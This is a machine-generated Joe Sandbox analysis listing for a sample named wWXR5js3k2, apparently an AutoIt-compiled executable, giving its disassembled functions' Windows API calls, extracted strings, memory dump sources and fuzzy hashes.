                                                    • Instruction Fuzzy Hash: 5F41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                    Function 032D3460 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction ID: 4f5d17e1e56b71fab0598c1703d046e50bfd336d14e1503a986fe1b93dd484ca
                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction Fuzzy Hash: A801D278A10209EFCB84DF98C5809AEF7B5FB48310F248199D909A7700D734EE81DB80
                                                    Function 032D34C0 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction ID: ce49d1a951a4582a1b58a2fedb35d132a337886d739d0bf9a3b559f8e982f3bf
                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction Fuzzy Hash: 8F019278A11209EFCB44DF98C5909AEF7F5FB48310F248599D909A7701D731AE81DB81
                                                    Function 032D1E70 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                    Function 006C7806 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 006C785B
                                                    • DeleteObject.GDI32(00000000), ref: 006C786D
                                                    • DestroyWindow.USER32 ref: 006C787B
                                                    • GetDesktopWindow.USER32 ref: 006C7895
                                                    • GetWindowRect.USER32(00000000), ref: 006C789C
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006C79DD
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006C79ED
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A35
                                                    • GetClientRect.USER32(00000000,?), ref: 006C7A41
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006C7A7B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A9D
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AB0
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7ABB
                                                    • GlobalLock.KERNEL32(00000000), ref: 006C7AC4
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AD3
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 006C7ADC
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AE3
                                                    • GlobalFree.KERNEL32(00000000), ref: 006C7AEE
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7B00
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006E2CAC,00000000), ref: 006C7B16
                                                    • GlobalFree.KERNEL32(00000000), ref: 006C7B26
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006C7B4C
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006C7B6B
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7B8D
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7D7A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-3613752883
                                                    • Opcode ID: 205d0107c15c1f328159f3e95b6c3d5c0b1fc966b559eee90e76cf5960aedeec
                                                    • Instruction ID: 5909f4a7d443d0f1a304ea0c3652af53ac0f06331d7d502c02b8de60bd3c2a61
                                                    • Opcode Fuzzy Hash: 205d0107c15c1f328159f3e95b6c3d5c0b1fc966b559eee90e76cf5960aedeec
                                                    • Instruction Fuzzy Hash: 3F023971901115EFDB14DFA8DC89EAE7BBAEF48310F148169F916AB2A1C734AD01CF64
                                                    Function 006DA5DA Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 006DA630
                                                    • GetSysColorBrush.USER32(0000000F), ref: 006DA661
                                                    • GetSysColor.USER32(0000000F), ref: 006DA66D
                                                    • SetBkColor.GDI32(?,000000FF), ref: 006DA687
                                                    • SelectObject.GDI32(?,00000000), ref: 006DA696
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 006DA6C1
                                                    • GetSysColor.USER32(00000010), ref: 006DA6C9
                                                    • CreateSolidBrush.GDI32(00000000), ref: 006DA6D0
                                                    • FrameRect.USER32(?,?,00000000), ref: 006DA6DF
                                                    • DeleteObject.GDI32(00000000), ref: 006DA6E6
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 006DA731
                                                    • FillRect.USER32(?,?,00000000), ref: 006DA763
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DA78E
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(00000012), ref: 006DA903
                                                      • Part of subcall function 006DA8CA: SetTextColor.GDI32(?,?), ref: 006DA907
                                                      • Part of subcall function 006DA8CA: GetSysColorBrush.USER32(0000000F), ref: 006DA91D
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(0000000F), ref: 006DA928
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(00000011), ref: 006DA945
                                                      • Part of subcall function 006DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DA953
                                                      • Part of subcall function 006DA8CA: SelectObject.GDI32(?,00000000), ref: 006DA964
                                                      • Part of subcall function 006DA8CA: SetBkColor.GDI32(?,00000000), ref: 006DA96D
                                                      • Part of subcall function 006DA8CA: SelectObject.GDI32(?,?), ref: 006DA97A
                                                      • Part of subcall function 006DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 006DA999
                                                      • Part of subcall function 006DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DA9B0
                                                      • Part of subcall function 006DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 006DA9C5
                                                      • Part of subcall function 006DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006DA9ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID: @U=u
                                                    • API String ID: 3521893082-2594219639
                                                    • Opcode ID: 0eec560b87024ee6d7055d7a747cb3e58261a69c5d036410f89542c15e048932
                                                    • Instruction ID: 20669eb3e16e033b3173fcfff75a15aedd6c7943c1d3346d39a0faa57c68647e
                                                    • Opcode Fuzzy Hash: 0eec560b87024ee6d7055d7a747cb3e58261a69c5d036410f89542c15e048932
                                                    • Instruction Fuzzy Hash: 83918E72809301FFC7109FA4DC08A5B7BAAFF89321F145B2AF962962E0D771D945CB52
                                                    Function 006D356B Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,006DF910), ref: 006D3627
                                                    • IsWindowVisible.USER32(?), ref: 006D364B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-3469695742
                                                    • Opcode ID: 0b04f97e317a1f912f0a6502f6d27ffb572ee9759287b2657a41a82a062aea23
                                                    • Instruction ID: 78a28a69cc4ad846462451ae3e55c495c6c1364cd69cbf0973519521d12822d9
                                                    • Opcode Fuzzy Hash: 0b04f97e317a1f912f0a6502f6d27ffb572ee9759287b2657a41a82a062aea23
                                                    • Instruction Fuzzy Hash: 31D16B30A04311DBCB44EF10C852AAE77A3AF95754F14856DF8865B3E3DB21EE0ACB56
                                                    Function 00652C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00652CA2
                                                    • DeleteObject.GDI32(00000000), ref: 00652CE8
                                                    • DeleteObject.GDI32(00000000), ref: 00652CF3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00652CFE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00652D09
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0068C43B
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0068C474
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0068C89D
                                                      • Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A
                                                    • SendMessageW.USER32(?,00001053), ref: 0068C8DA
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0068C8F1
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068C907
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068C912
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0$@U=u
                                                    • API String ID: 464785882-975001249
                                                    • Opcode ID: 55c09651648ba52b3562c374ec30104f113174cc9f5562886d15246775a7c378
                                                    • Instruction ID: af2779c4717c965e11ab7300a835550a4f8f3703135b776d5aec98fccbbc92d3
                                                    • Opcode Fuzzy Hash: 55c09651648ba52b3562c374ec30104f113174cc9f5562886d15246775a7c378
                                                    • Instruction Fuzzy Hash: 8412A030500202DFDB51DF24C894BA9BBE2FF45321F548669F856DB662C731E896CBA1
                                                    Function 006C74AB Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 006C74DE
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006C759D
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006C75DB
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006C75ED
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006C7633
                                                    • GetClientRect.USER32(00000000,?), ref: 006C763F
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006C7683
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006C7692
                                                    • GetStockObject.GDI32(00000011), ref: 006C76A2
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006C76A6
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006C76B6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006C76BF
                                                    • DeleteDC.GDI32(00000000), ref: 006C76C8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006C76F4
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 006C770B
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006C7746
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006C775A
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 006C776B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006C779B
                                                    • GetStockObject.GDI32(00000011), ref: 006C77A6
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006C77B1
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006C77BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-2771358697
                                                    • Opcode ID: 283ec8ff5ad3df5687cacb4e3b5ae679a176c1784b96728fad207b5be36b4892
                                                    • Instruction ID: dc6deae6380c6f893995c614310f941822070bb2c337c09e73da82d74a58d58c
                                                    • Opcode Fuzzy Hash: 283ec8ff5ad3df5687cacb4e3b5ae679a176c1784b96728fad207b5be36b4892
                                                    • Instruction Fuzzy Hash: 5AA164B1A40615FFEB14DB68DC4AFAE77BAEB44710F048119FA15A72E0C774AD00CB64
                                                    Function 006DA8CA Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 006DA903
                                                    • SetTextColor.GDI32(?,?), ref: 006DA907
                                                    • GetSysColorBrush.USER32(0000000F), ref: 006DA91D
                                                    • GetSysColor.USER32(0000000F), ref: 006DA928
                                                    • CreateSolidBrush.GDI32(?), ref: 006DA92D
                                                    • GetSysColor.USER32(00000011), ref: 006DA945
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DA953
                                                    • SelectObject.GDI32(?,00000000), ref: 006DA964
                                                    • SetBkColor.GDI32(?,00000000), ref: 006DA96D
                                                    • SelectObject.GDI32(?,?), ref: 006DA97A
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 006DA999
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DA9B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006DA9C5
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006DA9ED
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006DAA14
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 006DAA32
                                                    • DrawFocusRect.USER32(?,?), ref: 006DAA3D
                                                    • GetSysColor.USER32(00000011), ref: 006DAA4B
                                                    • SetTextColor.GDI32(?,00000000), ref: 006DAA53
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006DAA67
                                                    • SelectObject.GDI32(?,006DA5FA), ref: 006DAA7E
                                                    • DeleteObject.GDI32(?), ref: 006DAA89
                                                    • SelectObject.GDI32(?,?), ref: 006DAA8F
                                                    • DeleteObject.GDI32(?), ref: 006DAA94
                                                    • SetTextColor.GDI32(?,?), ref: 006DAA9A
                                                    • SetBkColor.GDI32(?,?), ref: 006DAAA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID: @U=u
                                                    • API String ID: 1996641542-2594219639
                                                    • Opcode ID: 0172b88d312611cecd6cbb02f6b8e43515310b99f5d4e1554fd96b1368567fdf
                                                    • Instruction ID: 1e151939c9e66781f6bae3d74f3f9762f0f1b34e5e5e034dca911cc0dfdc87c1
                                                    • Opcode Fuzzy Hash: 0172b88d312611cecd6cbb02f6b8e43515310b99f5d4e1554fd96b1368567fdf
                                                    • Instruction Fuzzy Hash: 6E513E71D01208EFDB109FA4DC48EAE7BBAEF08320F155226F916AB2A1D7759940DB50
                                                    Function 006D9A1C Relevance: 46.0, APIs: 23, Strings: 3, Instructions: 455windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 006D9AD2
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006D9B8B
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 006D9BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0$@U=u$hW
                                                    • API String ID: 2326795674-1221071083
                                                    • Opcode ID: d6e6ed1af5f6baac44f2db34c934877b38fdaf8a1b91608758c5ccce29e96e65
                                                    • Instruction ID: f26564183c3ff39b5ba50348c961d124cc45a4ecc0069be09ddb4844f10be0b4
                                                    • Opcode Fuzzy Hash: d6e6ed1af5f6baac44f2db34c934877b38fdaf8a1b91608758c5ccce29e96e65
                                                    • Instruction Fuzzy Hash: D202CD30909241AFD725CF24C849BEABBE6FF89314F04852EF999D63A1C774D944CB62
                                                    Function 006BAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BAD1E
                                                    • GetDriveTypeW.KERNEL32(?,006DFAC0,?,\\.\,006DF910), ref: 006BADFB
                                                    • SetErrorMode.KERNEL32(00000000,006DFAC0,?,\\.\,006DF910), ref: 006BAF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: d8fb6a02feea4a85c71679075e2bf536d6e34f6f9ff97c51318240628f6fe77b
                                                    • Instruction ID: bea6755d8b281624538801fb142243651449cd17c06d93c9482cb496c0b8d395
                                                    • Opcode Fuzzy Hash: d8fb6a02feea4a85c71679075e2bf536d6e34f6f9ff97c51318240628f6fe77b
                                                    • Instruction Fuzzy Hash: 3B5191F0644205EACB90EF90C942CFD73A7EB08701B24815AF847A72D1DA759D8AEB57
                                                    Function 006568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 586137384ce90955e49d7fa855c51334b1b1521af4b70ffb5f27a10cd8af0b85
                                                    • Instruction ID: e5372e17adc8870cd1851bea6db075fa58eaa433d2ff8948d31651a6e2481dc6
                                                    • Opcode Fuzzy Hash: 586137384ce90955e49d7fa855c51334b1b1521af4b70ffb5f27a10cd8af0b85
                                                    • Instruction Fuzzy Hash: 358128B0600216ABCB60BB60DC52FEB37ABAF15701F444129FC056B296EB61DE49D369
                                                    Function 006D89D5 Relevance: 42.4, APIs: 21, Strings: 3, Instructions: 401windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006D8AC1
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8AD2
                                                    • CharNextW.USER32(0000014E), ref: 006D8B01
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006D8B42
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006D8B58
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8B69
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006D8B86
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 006D8BD8
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006D8BEE
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D8C1F
